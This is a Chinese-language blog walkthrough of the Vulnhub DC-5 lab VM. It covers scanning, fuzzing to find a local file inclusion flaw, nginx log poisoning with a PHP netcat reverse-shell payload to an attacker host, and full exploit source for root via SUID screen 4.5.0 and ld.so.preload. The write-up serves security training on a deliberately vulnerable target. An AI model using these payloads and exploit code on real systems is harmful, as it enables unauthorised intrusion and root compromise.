

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
  <title>Vulnhub DC 5 Workthrough - M0untainShley</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"ee9387c15cc7097331ccc74141d07081","google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>M0untainShley</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                Links
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Vulnhub DC 5 Workthrough">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-10-30 19:15" pubdate>
        October 30, 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.4k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      39
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Vulnhub DC 5 Workthrough</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：October 31, 2021 am
                
              </p>
            
            <div class="markdown-body">
              <h3 id="靶机介绍"><a href="#靶机介绍" class="headerlink" title="靶机介绍"></a>靶机介绍</h3><p>DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.</p>
<p>The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).</p>
<p>As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.</p>
<p>And just for the record, there is no phpmailer exploit involved. :-)</p>
<p>The ultimate goal of this challenge is to get root and to read the one and only flag.</p>
<p>Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.</p>
<p>For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.</p>
<p>But if you’re really, really stuck, you can watch this video which shows the first step.</p>
<p>前几个靶机作者认为不会很难，这个靶机作者认为是中等难度且只有一个切入点，在获取切入点时确实花了一番功夫</p>
<h3 id="靶机获取"><a href="#靶机获取" class="headerlink" title="靶机获取"></a>靶机获取</h3><p><a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/dc-5,314/">https://www.vulnhub.com/entry/dc-5,314/</a></p>
<h3 id="获取Flag"><a href="#获取Flag" class="headerlink" title="获取Flag"></a>获取Flag</h3><h4 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h4><p>探测DC-5，发现目标主机：192.168.199.101</p>
<img src="/img/Vulnhub-DC-5过关笔记/1.png" srcset="/img/loading.gif" lazyload>



<p><strong>PS：netdiscover工具可以用来进行存活主机探测，但是使用新版本的Kali（2021.3）进行192.168.199.0/24网段探测没有结果，得探测192.168.199.0/16才会有结果，这样会存在一个问题就是扫描范围太大了；使用以前版本的Kali（2017.1）可以进行192.168.199.0/24探测，探测截图如下，但是没有banner信息</strong></p>
<img src="/img/Vulnhub-DC-5过关笔记/3.png" srcset="/img/loading.gif" lazyload>



<p>端口扫描</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ nmap -A -sC -p- 192.168.199.101<br>...<br>PORT      STATE SERVICE VERSION<br>80/tcp    open  http    nginx 1.6.2<br>|_http-server-header: nginx/1.6.2<br>|_http-title: Welcome<br>111/tcp   open  rpcbind 2-4 (RPC <span class="hljs-comment">#100000)</span><br>| rpcinfo: <br>|   program version    port/proto  service<br>|   100000  2,3,4        111/tcp   rpcbind<br>|   100000  2,3,4        111/udp   rpcbind<br>|   100000  3,4          111/tcp6  rpcbind<br>|   100000  3,4          111/udp6  rpcbind<br>|   100024  1          40331/tcp6  status<br>|   100024  1          46074/tcp   status<br>|   100024  1          46108/udp   status<br>|_  100024  1          51857/udp6  status<br>46074/tcp open  status  1 (RPC <span class="hljs-comment">#100024)</span><br></code></pre></td></tr></table></figure>



<p>访问目标80端口</p>
<img src="/img/Vulnhub-DC-5过关笔记/2.png" srcset="/img/loading.gif" lazyload>



<p>其中Contact栏有一个表单提交，当提交内容时，会提交一些参数，同时，下面的版权的年份也会发生变化</p>
<img src="/img/Vulnhub-DC-5过关笔记/4.png" srcset="/img/loading.gif" lazyload>



<h4 id="LFI（Local-File-Include）漏洞发现"><a href="#LFI（Local-File-Include）漏洞发现" class="headerlink" title="LFI（Local File Include）漏洞发现"></a>LFI（Local File Include）漏洞发现</h4><p>使用wfuzz对参数进行模糊测试，看有没有一些服务器可以处理的一些参数</p>
<p>此处根据观察，在我们进行参数模糊测试的时候，页面一直返回状态是200，这也就造成了一个问题：回显的结果都是一样的，因此我们无法进行分别，<strong>经过观察发现，当无回显时（网站状态码此时为200），有66个词数，因此我们使用”–hw 66”来进行过滤这些内容</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 推荐几个fuzz字典</span><br><span class="hljs-comment"># Seclists字典：https://github.com/danielmiessler/SecLists</span><br><span class="hljs-comment"># fuzzdb：https://github.com/fuzzdb-project/fuzzdb</span><br><span class="hljs-comment"># 鸭王的字典：https://github.com/TheKingOfDuck/fuzzDicts/</span><br><span class="hljs-comment"># chen师傅的字典：https://github.com/gh0stkey/Web-Fuzzing-Box</span><br><br><span class="hljs-comment">#####################################################################</span><br><br><span class="hljs-comment"># chen师傅关于wfuzz的文章</span><br><span class="hljs-comment"># wfuzz基本功：https://gh0st.cn/archives/2018-10-28/2</span><br><span class="hljs-comment"># wfuzz初上手：https://gh0st.cn/archives/2018-10-28/1</span><br><span class="hljs-comment"># wfuzz高阶功法：https://gh0st.cn/archives/2018-10-28/3</span><br><br><span class="hljs-comment">#####################################################################</span><br><br>$ wfuzz -w /usr/share/wfuzz/wordlist/general/test.txt -w ./fuzzdb/attack/lfi/common-unix-httpd-log-locations.txt  --hw 66 http://192.168.199.101/thankyou.php?FUZZ=FUZ2Z<br>...<br>********************************************************<br>* Wfuzz 3.1.0 - The Web Fuzzer                         *<br>********************************************************<br><br>Target: http://192.168.199.101/thankyou.php?FUZZ=FUZ2Z<br>Total requests: 303992<br><br>=====================================================================<br>ID           Response   Lines    Word       Chars       Payload                                                                                                    <br>=====================================================================<br><br>000000029:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/apache2/error.log&quot;</span>                 <br>000000031:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/error.log&quot;</span>                         <br>000000027:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/apache2/error_log&quot;</span>                 <br>000000007:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /etc/httpd/logs/acces_log&quot;</span>                   <br>000000030:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/error_log&quot;</span>                         <br>000000028:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/apache/error.log&quot;</span>                   <br>000000003:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /apache/logs/error.log&quot;</span>                     <br>000000032:   200        52 L     370 W      3963 Ch     <span class="hljs-string">&quot;file - /var/log/nginx/error.log&quot;</span>                   <br>000000015:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/apache/access_log&quot;</span>                 <br>000000026:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/apache/error_log&quot;</span>                   <br>000000019:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/apache2/other_vhosts_access.log&quot;</span>   <br>000000022:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/www/logs/error_log&quot;</span>                     <br>000000017:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/apache/access.log&quot;</span>                 <br>000000024:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /usr/local/apache/logs/error_log&quot;</span>           <br>000000021:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/access.log&quot;</span>                         <br>000000018:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/apache2/access.log&quot;</span>                 <br>000000025:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /usr/local/apache/logs/error.log&quot;</span>           <br>000000020:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/access_log&quot;</span>                         <br>000000023:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/www/logs/error.log&quot;</span>                     <br>000000014:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /usr/local/apache/logs/access.log&quot;</span>           <br>000000006:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /apache/logs/access.log&quot;</span>                     <br>000000011:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/www/logs/access_log&quot;</span>                   <br>000000005:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /apache/logs/error.log&quot;</span>                     <br>000000013:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /usr/local/apache/logs/access_log&quot;</span>           <br>000000010:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /etc/httpd/logs/error.log&quot;</span>                   <br>000000008:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /etc/httpd/logs/acces.log&quot;</span>                   <br>000000016:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/apache2/access_log&quot;</span>                 <br>000000009:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /etc/httpd/logs/error_log&quot;</span>                   <br>000000012:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/www/logs/access.log&quot;</span>                   <br>000000002:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /apache/logs/access.log&quot;</span>                     <br>000000048:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/httpd/access_log&quot;</span>                   <br>000000039:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /opt/lampp/logs/error.log&quot;</span>                   <br>000000044:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /opt/xampp/logs/error.log&quot;</span>                   <br>000000033:   200        72 L     423 W      4895 Ch     <span class="hljs-string">&quot;file - /var/log/nginx/access.log&quot;</span>                   <br>000000047:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/httpd/error_log&quot;</span>                   <br>000000045:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /opt/bitnami/apache2/logs/access_log&quot;</span>       <br>000000004:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /apache/logs/access.log&quot;</span>                     <br>000000046:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /opt/bitnami/apache2/logs/error_log&quot;</span>         <br>000000035:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /opt/apache/conf/httpd.conf&quot;</span>                 <br>000000043:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /opt/xampp/logs/error_log&quot;</span>                   <br>000000036:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /opt/lampp/logs/access_log&quot;</span>                 <br>000000040:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /opt/xampp/etc/php.ini&quot;</span>                     <br>000000051:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/httpd-error.log&quot;</span>                   <br>000000041:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /opt/xampp/logs/access_log&quot;</span>                 <br>000000037:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /opt/lampp/logs/access.log&quot;</span>                 <br>000000049:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/apache2/error.log&quot;</span>                 <br>000000042:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /opt/xampp/logs/access.log&quot;</span>                 <br>000000034:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /opt/apache2/conf/httpd.conf&quot;</span>               <br>000000038:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /opt/lampp/logs/error_log&quot;</span>                   <br>000000050:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/apache2/access.log&quot;</span>                 <br>000000052:   200        42 L     63 W       835 Ch      <span class="hljs-string">&quot;file - /var/log/httpd-access.log&quot;</span><br></code></pre></td></tr></table></figure>

<img src="/img/Vulnhub-DC-5过关笔记/5.png" srcset="/img/loading.gif" lazyload>



<p><strong>此处需要注意一下，不能选取太大的字典，因为后面查看nignx日志的时候会因为文件太大导致无法服务文件内容（服务端500）</strong></p>
<p>经过模糊测试，发现可以使用file协议来进行文件读取</p>
<img src="/img/Vulnhub-DC-5过关笔记/6.png" srcset="/img/loading.gif" lazyload>



<p>同时，我们发现可以读取到nginx日志文件（观察一下行数，词数和字节数跟其他行不一样）</p>
<img src="/img/Vulnhub-DC-5过关笔记/7.png" srcset="/img/loading.gif" lazyload>



<h4 id="本地文件包含漏洞Getshell"><a href="#本地文件包含漏洞Getshell" class="headerlink" title="本地文件包含漏洞Getshell"></a>本地文件包含漏洞Getshell</h4><p>发现了本地文件包含漏洞，就可以想一下怎样拿到权限了，思路是这样子的：<strong>我们可以在访问该网站时，将恶意代码写入UA头中，再通过本地文件包含漏洞来包含该文件，使得恶意代码执行</strong></p>
<p>Kali（IP）监听本地4141端口</p>
<p>使用curl命令请求，我们在curl命令中使用nc来反弹shell，当文件包含漏洞触发时，shell会反弹给Kali</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ curl -A <span class="hljs-string">&quot;&lt;?php system(&#x27;nc 192.168.199.146 4141 -e /bin/bash&#x27;)?&gt;&quot;</span> http://192.168.199.101/thankyou.php<br></code></pre></td></tr></table></figure>



<p>访问该页面，Kali上线</p>
<img src="/img/Vulnhub-DC-5过关笔记/8.png" srcset="/img/loading.gif" lazyload>

<img src="/img/Vulnhub-DC-5过关笔记/9.png" srcset="/img/loading.gif" lazyload>



<h4 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h4><p>使用python得到一个更方便的shell</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ python -c <span class="hljs-string">&quot;import pty;pty.spawn(&#x27;/bin/bash&#x27;);&quot;</span><br></code></pre></td></tr></table></figure>



<p>查看是否可以使用SUID进行提权，使用”sudo -l”，提示”command not found”，那就换find</p>
<p>发现了一个命令”/bin/screen-4.5.0”</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ find / -user root -perm -4000 -<span class="hljs-built_in">print</span> 2&gt;/dev/null<br></code></pre></td></tr></table></figure>

<img src="/img/Vulnhub-DC-5过关笔记/10.png" srcset="/img/loading.gif" lazyload>



<p>查找关键字”screen 4.5.0”的漏洞，发现了一个脚本，下载该脚本到本地</p>
<img src="/img/Vulnhub-DC-5过关笔记/11.png" srcset="/img/loading.gif" lazyload>



<p>查看该脚本，发现该脚本是使用c语言进行编写的，因此需要手动进行编译，我们需要做以下事情</p>
<ul>
<li>将第一部分保存为libhax.c</li>
<li>将第二部分保存为rootshell.c</li>
<li>第三部分为一个脚本文件，命名为shell.sh（任意命名即可）</li>
</ul>
<img src="/img/Vulnhub-DC-5过关笔记/12.png" srcset="/img/loading.gif" lazyload>



<p>接下来进行操作，将三段代码分别存在在三个文件中</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ vim libhax.c                                        <br>                                                                                                             $ vim rootshell.c<br>                                                                                                             $ vim shell.sh                                        <br>                                                                                                             $ cat libhax.c <br><span class="hljs-comment">#include &lt;stdio.h&gt;</span><br><span class="hljs-comment">#include &lt;sys/types.h&gt;</span><br><span class="hljs-comment">#include &lt;unistd.h&gt;</span><br>__attribute__ ((__constructor__))<br>void dropshell(void)&#123;<br>    chown(<span class="hljs-string">&quot;/tmp/rootshell&quot;</span>, 0, 0);<br>    chmod(<span class="hljs-string">&quot;/tmp/rootshell&quot;</span>, 04755);<br>    unlink(<span class="hljs-string">&quot;/etc/ld.so.preload&quot;</span>);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;[+] done!\n&quot;</span>);<br>&#125;<br>                                                                                                             $ cat rootshell.c <br><span class="hljs-comment">#include &lt;stdio.h&gt;</span><br>int main(void)&#123;<br>    setuid(0);<br>    setgid(0);<br>    seteuid(0);<br>    setegid(0);<br>    execvp(<span class="hljs-string">&quot;/bin/sh&quot;</span>, NULL, NULL);<br>&#125;<br>                                                                                                             $ cat shell.sh   <br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;[+] Now we create our /etc/ld.so.preload file...&quot;</span><br><span class="hljs-built_in">cd</span> /etc<br><span class="hljs-built_in">umask</span> 000 <span class="hljs-comment"># because</span><br>screen -D -m -L ld.so.preload <span class="hljs-built_in">echo</span> -ne  <span class="hljs-string">&quot;\x0a/tmp/libhax.so&quot;</span> <span class="hljs-comment"># newline needed</span><br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;[+] Triggering...&quot;</span><br>screen -ls <span class="hljs-comment"># screen itself is setuid, so... </span><br>/tmp/rootshell<br></code></pre></td></tr></table></figure>

<img src="/img/Vulnhub-DC-5过关笔记/13.png" srcset="/img/loading.gif" lazyload>



<p>编译文件    </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ gcc -fPIC -shared -ldl -o libhax.so libhax.c<br>$ gcc -o rootshell rootshell.c<br></code></pre></td></tr></table></figure>

<img src="/img/Vulnhub-DC-5过关笔记/14.png" srcset="/img/loading.gif" lazyload>



<p>Kali上起一个python服务器，供DC-5下载这些脚本和可执行文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ python -m SimpleHTTPServer 8888<br>Serving HTTP on 0.0.0.0 port 8888 ...<br></code></pre></td></tr></table></figure>



<p>到DC-5上下载</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ wget http://192.168.199.146:8888/shell.sh<br>$ wget http://192.168.199.146:8888/libhax.so<br>$ wget http://192.168.199.146:8888/rootshell<br></code></pre></td></tr></table></figure>



<p>提权，获取flag</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash">$ ls -l<br>$ chmod +x shell.sh<br>$ ./shell.sh<br>$ id<br>$ ls /root<br>$ cat /root/thisistheflag.txt<br></code></pre></td></tr></table></figure>

<img src="/img/Vulnhub-DC-5过关笔记/15.png" srcset="/img/loading.gif" lazyload>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Vulnhub/">Vulnhub</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    转载请保留原文链接及作者
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/10/30/Vulnhub-DC-4-Workthrough/">
                        <span class="hidden-mobile">Vulnhub DC 4 Workthrough</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"87DviF4Tc6ftT198Wx2XV99q-gzGzoHsz","appKey":"wWetKPApalpJJoqj5nyGYBJl","placeholder":"说点什么","path":"window.location.pathname","avatar":"retro","meta":["nick","mail","link"],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false,"requiredFields":[]},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
